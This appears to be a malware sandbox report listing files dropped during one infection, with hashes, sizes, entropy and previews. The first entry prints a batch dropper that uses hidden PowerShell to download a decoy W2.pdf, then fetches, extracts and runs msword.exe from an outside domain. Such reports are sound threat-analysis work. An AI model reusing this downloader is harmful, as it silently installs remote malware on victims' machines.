C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\c2[1].bat

Download File

Process:	C:\Windows\SysWOW64\mshta.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	498
Entropy (8bit):	5.198499125177484
Encrypted:	false
SSDEEP:	12:wmDU081kkGrAOtD0OO081kkGVX5OQ981kvYX53RP:wmD7RrAO90OxRxUkvYX53RP
MD5:	E8DFDB915A523A09E139AAA900991DDD
SHA1:	D23F4798C549BFB7DDD968C4C2A971F67468A662
SHA-256:	91619737B3F7AF4623DC62B4F3DF7B551337EC94F693A3B9BA35BB231483393E
SHA-512:	B4E737D1C80420688BF856DF02A580B691D120307B7D31EA4766448CCD0C6EEC7B2C48424691E92DFFBA58CA8C9A8DF989F5B683D9363CAC37D3DD3E5AD1623E
Malicious:	true
Preview:	@echo off..set url=https://myguyapp.com/msword.zip..set url2=https://myguyapp.com/W2.pdf..powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri %url2% -OutFile %USERPROFILE%\Downloads\W2.pdf"..cd %USERPROFILE%\Downloads..start W2.pdf..powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri %url% -OutFile %temp%\msword.zip"..powershell -WindowStyle Hidden -Command "Expand-Archive -Path %temp%\msword.zip -DestinationPath %temp%\msword -Force"..cd %temp%\msword..start msword.exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\677826\Prostores.com
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	5.019506780280991
Encrypted:	false
SSDEEP:	12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzd:qlupdRNuKyGX85jvXhNlT3/7AcV9Wro
MD5:	7459F6DA71CD5EAF9DBE2D20CA9434AC
SHA1:	4F60E33E15277F7A632D8CD058EC7DF4728B40BC
SHA-256:	364A445C3A222EE10A8816F78283BBD0503A5E5824B2A7F5DCD8E6DA9148AF6A
SHA-512:	3A862711D78F6F97F07E01ACC0DCB54F595A23AACEA9F2BB9606382805E1E92C1ACE09E1446F312F3B6D4EE63435ABEF46F0C16F015BD505347A1BCF2E149841
Malicious:	false
Preview:	{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	21979
Entropy (8bit):	5.049158677118914
Encrypted:	false
SSDEEP:	384:aPVoGIpN6KQkj2qkjh4iUxehQVlardFWgxOdB2tAHkDNXp5pNSSme+vOjJiYo0ik:aPV3IpNBQkj2Ph4iUxehYlardFWgxOdm
MD5:	E85ADBB7806D6C2B446681F25E86C54E
SHA1:	7945DA1DD2CC4F96AD9DD6E40803842C3497B0C0
SHA-256:	1DE8C1E231A1C77FB42123C0362070540F9692F0A3E4EA5141C6F8EE8DE8EBF5
SHA-512:	D60A6998458E9D2FB6F6345306DA7CB679E8A8202270B1C31519FFD017C102D7B46A7FD98011577784E2ADA33C0FCCA138EA1BB68C4260E45FA3BAFC307A60D3
Malicious:	false
Preview:	PSMODULECACHE.......CB.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem...............?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet..........?T.z..C...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSI.psd1........Register-IscsiSession........New-IscsiTargetPortal........Get-IscsiTarget........Connect-IscsiTarget........Get-IscsiConnection........Get-IscsiSession........Remove-IscsiTargetPortal.....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\677826\N

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	733484
Entropy (8bit):	7.999727303580045
Encrypted:	true
SSDEEP:	12288:7EjETXeEPYtANOcxShg6LO5mrcPIez2EsXwEA0cIYJU9YoULsEpW2bhhbaIkJflE:7EE9Iln+6LcmoPIezgAv0JioULJpph93
MD5:	C82D57C04AAD2BD54DFEED7CBFEE8ECB
SHA1:	C564CFCA3BCC3A26128917C94AB4E44F9CD25BBE
SHA-256:	4E285732BD17A06AE4BE71BEAAD8E5CE4DBD211F2888B4571D5D0C716764C767
SHA-512:	9D3102EFB33D4B5A510D24D1B7F313C66CB502B6B7572EF2C10538D3B48B8D63D7CAD41E5B9596181B142A7FDFD27727C6541A55307B4C4F793B957ACD7ECEDB
Malicious:	false
Preview:	.....#.<....d.Dm{R..fR.@^..J"..H$.\|...H.[.....#W..br'..Y.$y.l...wFU..9..aQ8.r...e...H(..y..'...u/(..c.!$..x.\z..g.d.j.....xe.J><5...S=&....L.'.D\Nm..N.....k.L..b D.".<)\_.t.....4.s.6...o=.Y....c..!T.D..aI.0.x.vC.Q,.].I^...E.5....`..y...y..!.d7..n....FW.....IO..c.D..\|.-Q.C'.#.`.))..:..@~.j.L/9.Z~........0..:Q. %..).w%.l)...5%..l..7q.....F0.T..>GU..P.DA.]..f......BMv$.g2g<u.....O...../.0N...c..H.%........Q.....&@p...OE..R..:.g....p'.Y.+.^..............k.1..".S.....>.A.4^.....9..).=?`....]..:.nF.....Ty.k..t..lK..^.....:E...u-_.1&T<...p.._..a..u..{g....4..fF,.:%...../..T&.......hB;.......3'.<p".u..7.ju...c.f(pTp.I./...r,.X.....f...........I...E.'pji.d....B.N<..P..5p.q]...:.1Xj.:.>.E..J..l.Z.H!r'hJ....".(.S...`..AIe.b&B..p....#.. 6..2...#.....D.(.X.AZ...%8;b..~*K..d.ja0..n..jU8.G.8.u..3....h.g.LB...._".&{...ggaF..X.0..u]..#...g6+..GR.i.?..Y.( Lv..0.........1<..<...$.'......l.).....]....}(..(.q...fJp..9,....U...@....e..-....WJv]..C1u

C:\Users\user\AppData\Local\Temp\677826\Prostores.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Alcohol

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	6.704539217194939
Encrypted:	false
SSDEEP:	768:9pQLiype/ehju5rWiq/DOSOlwRDNFoDu+XdoXSMf17+sVXnQkdFLILu8rbPDmhdu:9eOypvcLSDOSpZ+Sh+I+FrbCyI7P4CK
MD5:	DD266093B6C3933B83753002FA856A2E
SHA1:	39D54DC7D7DC9A7C7DD626046096730E730C22D4
SHA-256:	5FD8ED3BCC118A3E4DA9669B07497F3933245FDF4451276394858022E8F867BB
SHA-512:	A6CAB1788FBCE3DC329F84B2CFE034D67CE909A0DCF871F22E51AD11E17A26201F894280568FA46C2DCFFA74CD6E9BE4287201617288A1C171DEDF52F370B7C5
Malicious:	false
Preview:	..x.........} .......0f......Q.u..u.j..p.......]..M ..`+J................}.3.VS.].WS.u.ja.u..X........u.............P...WSh.&J..:...V.u.WS.u.jb.u..".....(..t.WSh.&J......V.u.WS.u.je.u........(..t.WSh.&J......V.u.WS.u.jT.u........(....z...WSh.&J......V.u.WS.u.jY.u.......(....j....K...S.u.3....u.....u.P.u............&....u..u.h.&J..l...S.u..u..u.j..u.......$.E..H...xC....>.u..E..u........./............E..H...x.......u..E..u.......................!..2......E..H....\|.....} ......$ f....P.u..u.j.Q.D....u..u.h.&J..\|.....w..b...t...p......H...tZH...tD...u..E..H.....w........n.....u.f..uu.j.Y.} ......$0f....P.u..u.j...u..u.h.&J.......u..u V..`+J........}..].WS.u.jI.u.................WSh.&J.......u VWS.u.jM.u........(........WSh.&J.......u VWS.u.jS.u.......(...._...WSh.&J......u VWS.u.jp......u..u..u.jX.u..............E..@.....j........a.......E.....L.......P....u..u.P.......x....................4.......E.3.P.u.....Y.........E.9p t .E..u.P...Y.........M..M..M....M....3.+.j<^.

C:\Users\user\AppData\Local\Temp\Charged

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	92160
Entropy (8bit):	7.998070494541723
Encrypted:	true
SSDEEP:	1536:164/pznuZpMquK4j4dDY6M6Kio9mtkSE5U7rHuBEeiXzqLd/R9+1V4Lm2etN0:84B6pMquTQY6M9iAtSEfBrieLd59+MLj
MD5:	21A1CAF7906CD79FA2F0C1CCB065C02F
SHA1:	35D20FB034F3587773695FBE05FB0984BE7CC12C
SHA-256:	0817E365A8A9BD66F18EBC955AF76D00EA70071573952988E9701F5944B12EC8
SHA-512:	4952E631E2B98F19CD4952F8F4CA7B422025E6111678A3AEE94197FD7E7B2F6DA5C8761CE9A9F2EC909F184B9172275C11A21CB430B6D90171115005D5733E59
Malicious:	false
Preview:	.....#.<....d.Dm{R..fR.@^..J"..H$.\|...H.[.....#W..br'..Y.$y.l...wFU..9..aQ8.r...e...H(..y..'...u/(..c.!$..x.\z..g.d.j.....xe.J><5...S=&....L.'.D\Nm..N.....k.L..b D.".<)\_.t.....4.s.6...o=.Y....c..!T.D..aI.0.x.vC.Q,.].I^...E.5....`..y...y..!.d7..n....FW.....IO..c.D..\|.-Q.C'.#.`.))..:..@~.j.L/9.Z~........0..:Q. %..).w%.l)...5%..l..7q.....F0.T..>GU..P.DA.]..f......BMv$.g2g<u.....O...../.0N...c..H.%........Q.....&@p...OE..R..:.g....p'.Y.+.^..............k.1..".S.....>.A.4^.....9..).=?`....]..:.nF.....Ty.k..t..lK..^.....:E...u-_.1&T<...p.._..a..u..{g....4..fF,.:%...../..T&.......hB;.......3'.<p".u..7.ju...c.f(pTp.I./...r,.X.....f...........I...E.'pji.d....B.N<..P..5p.q]...:.1Xj.:.>.E..J..l.Z.H!r'hJ....".(.S...`..AIe.b&B..p....#.. 6..2...#.....D.(.X.AZ...%8;b..~*K..d.ja0..n..jU8.G.8.u..3....h.g.LB...._".&{...ggaF..X.0..u]..#...g6+..GR.i.?..Y.( Lv..0.........1<..<...$.'......l.).....]....}(..(.q...fJp..9,....U...@....e..-....WJv]..C1u

C:\Users\user\AppData\Local\Temp\Chief

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	138240
Entropy (8bit):	5.980191824734651
Encrypted:	false
SSDEEP:	3072:Y0ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBNbjaAtsPI:YV14ZgP0JaAOz04phdyQ
MD5:	5D7F155185B7B7CE52433DF0895CD254
SHA1:	3DCF933C6895B843DBA20447C21F673F83EAFA9D
SHA-256:	EEA2D5CFCF7311B8E926741CA23552D11D43049753BBB2EFD835A6E7CA9FB396
SHA-512:	29A0603A0AF8E8E0D9A8E8A414D91EDCBF6E5236D8F4A1496EC84DB26DCEC2CFCAE133BB33AE87CCBB6442F54ABFE8CA450CF65515EC587BF551B583828A3318
Malicious:	false
Preview:	t.P.e........u..'.....2._^]....y,.t..A0.I,V.0.....%T5M....^.y..u%.=L*M..u..T5M...d}.@.T5M.j...j...\|.I.3..U..}..t..u...(M..W......L)M.....L)M....u.3..-.@)M.Wj.......8W..\.I..M.j.W....\.I..M._..3.@]...U..)M....VW.}..E...t7..99t..@...M..y..u..E...)M.P......P.....;.tGQ....9...=.u..~..u.3..3.M..~:...E.}.;.t.V....9...E.)M.P.;....M..{8..3.@_^....U..}..t..u...(M..c......L)M.....L)M....tY.@)M.V....0.F...t.9..)M.u....)M...F.P..<.I..f...}..t#.u..u...@.I..F...4.I.9.u..L)M...)M.^]...U..}..t..u...(M........L)M.....L)M....u.3..-.@)M.......E..AX.E..A\.E...~..A`.E...~..Ad3.@]...U..}..t..u...(M..{......L)M.....L)M....t$.@)M.j.j.j ......E..1.A..E..A.....I.]...U..}..t..u...(M..(......L)M.....L)M....u.3..h.@)M..E.....L.V.....0....D{....L..8....F\|....E....t........E....t........Nl;M.t..u...7...E.......3.@^]...U..Q.}..t..u...(M.......L)M.....L)M.VW..........@)M.j.....0..P.E...\.I..}......#.+.....@.E....t.Wj..u...@.I...tb.}..t..u.j..u...@.I...tJ.~8.t?.....3.#.;....9E.t.j.;.u...L.I..FH

C:\Users\user\AppData\Local\Temp\Controversy

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	55296
Entropy (8bit):	7.996221667590853
Encrypted:	true
SSDEEP:	1536:5vS3nn2ZA7/kkNlk59NouS6HSV4y7ugw7wU140:5vSGZAzkkjkPNxS6HSGaugwz
MD5:	9AB6CC30C12CEB5D4F1BB3A55D4FE455
SHA1:	74C250C42E24E6DF717B49A4BED3729EB9064CAD
SHA-256:	3A83E692C74855B6DC24C7067D4308031310A678E4C57EF45E7D3EC9256844A1
SHA-512:	C96341AFA3630FA9212FF91D860CBFD37D135C52386A316C3B161BC0DF307486D4BF19FB7023532AE26380643F010BD7427BA5AB3768EE3E3F6D4BDD09921144
Malicious:	false
Preview:	.C\|,..X@`.C(r...E...q.[$.t.'.:..j...-....`./].....KD. .G+..... VP&.G.\..AH....^............f...M...&.......EAU........,.3A..e.....r...k.4..{.o..K.7}.".....[.Dq0Gu.. w..&.Q.bpF..._2..bt.DJ.cc....f^.?.O...pL.s^..-d.......\|..v.......T.:.....J-0........qB.%.........j...sr.n.+.j........n.....V..~..&.....i..w5}..u....F.......5d....rT.......;..)Omq........s.gIt..H..g.j/.......<..........T.)..B.&.....<..;KG.R....:s._.v.07..Vl.&:..Y.%...'.ljnw.t.`Vq..qE.b5J. 0.. .B .].A..n. ].7..{........x.?<.'.fX...:....m.......n.+ .kr....&{.M...`..a,X=;..:6Z.......3}...V.3...,..h..1d.....K..N<~.... .9...xHnF...X9...!...=.'V.Auy. ...e.........!..U..R...L../.....l#..o..:m7_gC.e....e.@...X...V.NCK..\|..3..zER):.pt....M...!r_I...(...D./.V.U.i.7..I.I...[P..s...9..~)..UK5.}e.~..%.q..@,...._...$>..H...J..Dpj.1.........!...<.q...._*..C.\...V..o.......`%l.>&._`9.Y.......m.R..E.?.(.J%Oy.....3. ..P.z7..[v..z...h.....qiM.! .vo..9...zb....h........@.&..

C:\Users\user\AppData\Local\Temp\Corporate

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	97280
Entropy (8bit):	6.581173789840171
Encrypted:	false
SSDEEP:	1536:A6GMKY99z+ajU1Rjv18fRQLTh/5fhjLueoMmOrrHL/uDoiouK+r5bLmbZzW9FfT+:AypIbv18mLthfhnueoMmOqDoioO5bLeF
MD5:	459740D3AA55D6BB677047A043A11049
SHA1:	20002F1D45FEA6EED6AFF3EAD22CFF091D78B41A
SHA-256:	4C4F6EF591CDD3D235FE09DF1A90CD5AF14C756A908BE132C13A9EDE2B7A900D
SHA-512:	B51D14C8DA04FFF2ED8D309B643A91F679BF2A31638B8E91B7DE9BB7CFE7F3AA8590432B685621B871A004DE2D8AEAFC0CCF057AE5F55BCB0661C7172105CB34
Malicious:	false
Preview:	...N........t$...........j.W.t$ ...t$(.C%.............C..0......N........L$........n..._^3.[..]...U..E.V.@..0...~....F.... .....u..u....F....&..F.....3.^]...U...TSV.5,.I.3.Wh....S....h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...h....S.E...E.E.P.E.........I...uN.u....S......3.B.V....H..D9.8\9.t..@8.P..D9.8\9.t..@8.X...0.I.SP...H.....q.....E..t.;D..t.C...~..u....~............F......._^3.[....U... SVW.E...P....I...4.I.P.E.P.......@....E..}.)E..E.)E.....u`.M...t..3..j.CSV.Rz...M..E.3..M.WSPV.}.]..(.......M..]....E.S.E..E.SPV.}.]..........M..:....~.G....?.....u....H..\|1...D1.t..@8.@......\|1...D1.t..@8.@...B......u..u...}.......F......!.G........3.C;.u..u...}......^..>_^3.[....U..V.u....W...~..u..F..H.....V.j.P.J..2.p...P...h...P....".._3.^]...U..E.V.@..0...x....F....L.....u..u....@....&..F.....3.^]...U..Q.E.SVW3..M.G.x..r..@..H..........~O.E.3..~F.@..0........F

C:\Users\user\AppData\Local\Temp\Dealer

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	52224
Entropy (8bit):	7.996119878250014
Encrypted:	true
SSDEEP:	768:U/Q+dzD31O3KAFDxDE5twt8C4wDBEZNBclMWOWQUvjBziwpfHS28mILe3VBGranP:U/Q+5MJFlMVCPGNelMUjtzpfl8HdCCS
MD5:	9C9C85945089A8C81528A6B23A209E20
SHA1:	599E249D010D0A40F3914D82AF710C655A1DA778
SHA-256:	71E8E4C78A2238179F1D01D2C280CAF8CCA1B62379C51FCEA39FAB2800990D5C
SHA-512:	26159EF952317A38560F91D10CCF89F9C652CFEFC73A15681F3554F36AE53326322ABB3466900466DBD0868971DF7A9D1C2D718FACFE87BECD13B7390438E9F0
Malicious:	false
Preview:	......CC...m..Y..#. .=..C.r.t...I$.#...l.7.-_..E8 ..x9....k.V9.'."..1...D".?.3z\|...\.. v...S.(..n.`)=/...cVF..S...gd`.Zs\|=... .%.X59.MW.]....Nk....fSN.f.F..uB..`.CE...].j#.....P?cl.<...0.2.!..t!...C.V..8O.7W...yqpy.v...#{dW.E......fm.+.W.b.OOm....{,.~....m.e.......HX.....M.c..c%.eb...O..U..._....n..v....=T..^.K...b.0.M_..F(......C...S..^...R\|....D..4...H~.9t;..^.4..3..n......V;\|.&M.s...yc...pls...R.`.`L..s..Vm.]...Q...w.<..1p......~8..^e.U...6...$....k....`.:E.{,......s..G~.W`c...\........A.P.^.......i..P)..N.&p.N.,.....#<}.w..j).c1....c.......;[.......,S.....d-R......Y.._J.1..h......{nRh.j..Q.......... _......_C.t.1...........T...h.`...e.....4.6<r.z[.Q..W ?X5.pHeg..RA.m7.:....5.NnPC.N],.s_.n..$.y.eL.S>..c.W.&o\|.Q.u.;..jb.l.Y.]...NY.!.!{?.........E.......+.x.W.X.)q.........(.y....'.>..........;."8..S.C...s.Oys....d.m)..m...su.\|...9..W=.....n...?.rBqV.&..`'../........Xt....t.wc..U......H.C...}.E..TFk.[.3.Te.X....}1...{.[.n.V.. {.Rwt..Y.....

C:\Users\user\AppData\Local\Temp\Fig

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	55296
Entropy (8bit):	7.996893434432179
Encrypted:	true
SSDEEP:	1536:Af058ph2Px8y8B71tsH84JDXInbJUYQkOy8n20NaupzF:Ae62my8Z1gLDXInbhQkOyA208upzF
MD5:	C7C08C021E27B2EEB0824937A10AC43D
SHA1:	3FFEC4974BCCF5A2CB9AD02411DBAD5B62F810A1
SHA-256:	4F6A15C2BC947318BA8BCCF9BE0948BCCB6740D1F06CCD5ECF9296609166E524
SHA-512:	0B539D2800C0FF28841F478368838B12CEE02019145275432CC7FD9767BCED34F444D1C77C50804DA36E00942FB19AC0AC65C73918D7F2E96EF77EBA28387D14
Malicious:	false
Preview:	Y..y.Y.X..(..C..m.pP..1.W.6.Xc.sI......daE..Z.y.>.U!....-...LX.vgm._U....{XU..!T..&..j:&...........!W..^Lh.[..}..........-.o.\|2=#..c...~.I..\|K.<Uj.z0..(.KZ.e......%~GL...E..j..M..L..2.KC.....(7.E.v!...".....(IW)..T.w.... ..Uk..^:.Tx/f..$oY.)N)..:LW].g.>...g.....(...(C.<f...6..`D.r..../w.-..I...0..=........S....d.0...W{.....RB...R.g..z....TM.dM:m....P...!3.;.i.!W.~.e.'........u...a...ajF.[M.Oj}..4...n.r..q].xT.6...{.I..)`....jiJ..2.U`......{..}..........X.U.md..,.U .9\|W.=.V.1Yx..,..%....t.8...G..G..D..O..S{.;oq<,xW...p,.B.....F..$MR....@"/...D.^....b..)^[.AI......b....(zn8.1.X5..'...\|.1j..=''XD...Yumt..Of..b>.....O"Of~..x..3j..'eW.V....K.LB ...i..R...u......KN.#...pf).....p.Q..D=g......:......r..[.f.n.....D-#?...g..3....;%.y5kL...8s.....J/.......#.oY$..^Z.@B.[...V.B..B[s.a.Y.).q.".O.......u...&...<{..r.1J...'G.2....MFN...'.1.C..3!...b..^...d..........>q....x..W...LH.{..G.v..l.&\|o.Z.T.un.K....E^......C.6.xcu...@.#u....*.f..Y.....1.

C:\Users\user\AppData\Local\Temp\Hearings

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	117760
Entropy (8bit):	6.296704167940761
Encrypted:	false
SSDEEP:	3072:SZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laWq:SK5vPeDkjGgQaE/lM
MD5:	1D1169E8E8C0DE7A5E7E1BABD8470DD6
SHA1:	4406EB665FC118B1767464F0CE2484C97EB4880B
SHA-256:	F20431C1D82AB151DDE7271CD37A6F208FCD45272D9A83980CCC3DD72D704F40
SHA-512:	4E7562F6102F1265BF5C64509ADC68769680110BFDD2333C977A3404CEA3D014960EF1BE276BFF241761C9E5135711D2DBA53980E5BB6EA83375E1951ECCD351
Malicious:	false
Preview:	MechanicalDlModularRuSchedulingVisibilityProposalsClimb..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.......................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Larger

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	146432
Entropy (8bit):	6.6465980351029454
Encrypted:	false
SSDEEP:	3072:DtNPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqVno:BNPj0nEo3tb2j6AUkB0CThp6vmVno
MD5:	39C723A69E6F51230D209B72F81ABE9B
SHA1:	B0F058579D60E5A6C612F60732FDF3D7C8E86A9C
SHA-256:	4A1B5FF59395FC0991987B588918649871A3106340A3D6F572C3FA232D59FBC9
SHA-512:	04858B44C1DB4B307F0FB2C853FFB0C1149A23166C670AAA407D191AB47CE21702858D4B30AABDDEC253652868E19B1A01ACF1E2A5AB776581E191CA38F8806B
Malicious:	false
Preview:	.E................E...6........E............E............E...........jR.d...f;.r.j0..[j9Xf;.w..r..u........f;.s.j=.9j:.5j..1j9.-.E...T....Qj0..j*..j>...u.j...j..E.Y...!...j..E.Y...'..........G.........E..........E...4....E..03..v............U...............E..E..P.E.P.M.....YY........~..u..U...@.K..M.P.u..u.......T.U..M.;.r%;.v.;.v/.G.;.w(...}.;.v......;.w....F.;.r..u....Q.M.R.u..U..u..........E..e...;...@......+.@.E..E..@....8.E................U.G...;.v.}..E..M...........;..........}.......]....t1;.s.j.Xf.............B..u=3...@f...........B.(;.s.j.Xf....f.2..f.:..u.3.@f..j.X..f.2..........F..4F...f;.t........M...F..I...A.E...U..H...t4;H s#..+P.........;........E....;H r.U.3.f9C.......jwY..B...Bf9.t.;.r.;........M.....t.9X.t.....u..........M..].U..E.P.u....u..U......jw....g.....C...CXf9.t..T.....N......Q........E..$...E.3.f9D....,....).....F.f;.t.j.Yf;...j.Zf;.................F.j.Zf;.t...}........f.F......f#.....f;...f.F......f#......f;...............}...

C:\Users\user\AppData\Local\Temp\Lets

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	7.997921805668066
Encrypted:	true
SSDEEP:	1536:4y+7CHT4k9YRtUo7NA2lVU2vBK8D3DhHMl+BAD1g:4iHTb9YRtU8RrU2vsgDtz61g
MD5:	FA2010085679EEC632F3107657E30A81
SHA1:	74611BE98EA26266232DD5A92F465D09273F76F6
SHA-256:	B449025FE3C3A0598C9D9BCF2D8C631FBA1B3C4144237D78FE6ECDD1574E2211
SHA-512:	5D2346B043F37469BE69690DA25B4257D8554A24B48214DC91E5957971184E56DB49AECD1CD2379D27BA0E31E1F31BEF07D974066AD5C92B95CAA16811126CA5
Malicious:	false
Preview:	.x..GaQ.#....^.....Y.u..S..)}S._...=d-P\Z.ZN1\....3.eF.9.MV..H8#Y.}r...ruV....t...M?6.....m..M.#.W..2....R...~..OQ- ..X..b....O....1.f...N.o...lZ..AMD.i](./....f.J.\|..Ay..}jK.vA...\|.....'..9BQ...b?....Q...%b..$l.X....._..F.....dS.;.....1/....L.....h.6......D..-/.r^.,.....F...Hy&.T7O....V.<R....O..:..Q$.d._..N..@...QSw..V.....l...E.9..#.^.%.z.......p..k...Z...PF[..\|....b.(y.ep..mAht&..E..P..aD.. ?x"f...?.W.Q...../.A.j.m@t#.]...V.#...Z.n.4...>.l.7.%..$!....m..{e.c.......8_5)..eJU.?......-.Z.]1.._...\%...I.N....L.h.S ....7(..}.t.c.o.......!.T=w...A)$..X.....0g.\|.O;.....t..q.....ai5{..z.Om<g..g:..z.f..C..j^N.!d.V.u..s..Y....7.MA..\|{...U{..v... j=.=.}2...g..TU.\|..T..".....}.9...n..F.e.....:UU.......^..y.......R#Z0...33..IY'8u.rP.D\|.N.nN....G~..........Ib.q.fN...J.j......:..V..}...'.y8y\.d.ZN...w`.o/.^..t@.A..\|......".....7f..&..#....u.B...):.....X....A...YRF.l...6.v.jjJ.w,.o.}<.....M^.*.......\|.........auRtO.I}...h9...W.....+a..R.!y...i...E.....

C:\Users\user\AppData\Local\Temp\MSId9b.LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	246
Entropy (8bit):	3.5193370621730837
Encrypted:	false
SSDEEP:	6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K82pClsulH:Qw946cPbiOxDlbYnuRK/pwH
MD5:	BECC46D5749BED5E0987D11B6715382F
SHA1:	F981C18B00D1ADEC8461E9888FC7DFBC8BC07CFF
